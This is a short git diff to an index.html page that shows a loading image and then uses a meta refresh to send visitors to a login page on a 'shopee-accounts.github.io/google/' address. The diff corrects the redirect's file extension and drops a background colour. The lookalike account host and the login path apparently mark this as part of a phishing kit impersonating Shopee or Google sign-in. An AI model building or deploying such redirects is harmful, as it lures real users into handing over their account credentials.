--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-<body bgcolor="#344E92">
+<body>
 <br>
 <br>
 <br>
@@ -15,4 +15,4 @@
 <br>
 <p align="center"><img src="./css/loading.gif">
 </p>
-<meta http-equiv="refresh" content="1;url=https://shopee-accounts.github.io/google/userlogin_u.htm">
+<meta http-equiv="refresh" content="1;url=https://shopee-accounts.github.io/google/userlogin_u.html">
